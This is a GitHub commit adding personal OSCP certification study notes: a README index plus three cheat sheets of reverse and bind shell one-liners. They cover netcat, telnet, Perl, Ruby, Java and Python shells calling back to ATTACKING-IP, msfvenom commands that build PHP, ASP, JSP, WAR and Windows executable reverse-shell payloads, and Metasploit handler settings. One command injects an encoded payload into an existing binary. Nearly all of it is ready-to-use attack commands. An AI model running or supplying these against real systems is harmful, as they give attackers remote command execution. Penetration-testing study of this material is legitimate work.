testing readme

AdmiralGaust · Dec 2, 2020 · 60f8092 · 60f8092
1 parent cb9401c
commit 60f8092
Show file tree

Hide file tree

Showing 4 changed files with 137 additions and 3 deletions.
diff --git a/README.md b/README.md
@@ -1,4 +1,6 @@
-# oscp
+# My OSCP Preparation notes
 
-1. Useful-Commands
-2. 
+* [Useful-Commands][./useful-commands.md]
+* [Key Points which can help](./key-points.md)
+* [Informational](./info)
+** [AJP and Coyote](./info/ajp-Coyote.md) 
diff --git a/shells/linux-shell.md b/shells/linux-shell.md
@@ -0,0 +1,56 @@
+## Netcat Shells
+
+```
+nc -nvlp 5555 -e /bin/bash
+nc 192.168.1.101 5555 -e /bin/bash
+
+without -e flag
+rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
+```
+* ncat is similar to nc but also supports ssl for encryption
+
+```
+ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
+ncat -nv <ip_to_connect> 4444
+```
+
+## SBD shells
+
+```
+sbd -lp 4444 -k secret -e /bin/bash
+sbd -k secret 127.0.0.1 4444
+```
+
+## Telnet
+
+```
+rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
+telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
+```
+
+## Perl
+
+```
+perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+## Ruby
+
+```
+ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+```
+
+## Java
+
+```
+r = Runtime.getRuntime()
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p.waitFor()
+```
+
+## python
+
+```
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+```
+
diff --git a/shells/webshells.md b/shells/webshells.md
@@ -0,0 +1,25 @@
+## [Reverse Shell Cheat Sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
+
+## PHP
+
+```
+msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php
+```
+
+## ASP
+
+```
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp
+```
+
+## WAR
+
+```
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war
+```
+
+## JSP
+
+```
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp
+```
diff --git a/shells/windows-shell.md b/shells/windows-shell.md
@@ -0,0 +1,51 @@
+## Msfvenom
+
+* Meterpreter
+
+```
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
+```
+
+```
+use exploit/multi/handler
+set payload windows/meterpreter/reverse_tcp
+```
+
+* Non-staged payload (works with nc)
+
+```
+msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
+```
+
+```
+use exploit/multi/handler
+set payload windows/shell_reverse_tcp
+```
+
+* Staged payload (must be caught with metasploit)
+
+```
+msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
+```
+
+```
+use exploit/multi/handler
+set payload windows/shell/reverse_tcp
+```
+
+* Inject payload into binary
+
+```
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
+```
+
+## Netcat Shell
+
+```
+nc.exe -nlvp 4444 -e cmd.exe
+nc.exe 192.168.1.101 443 -e cmd.exe
+
+ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
+ncat -nv <ip_to_connect> 4444
+```
+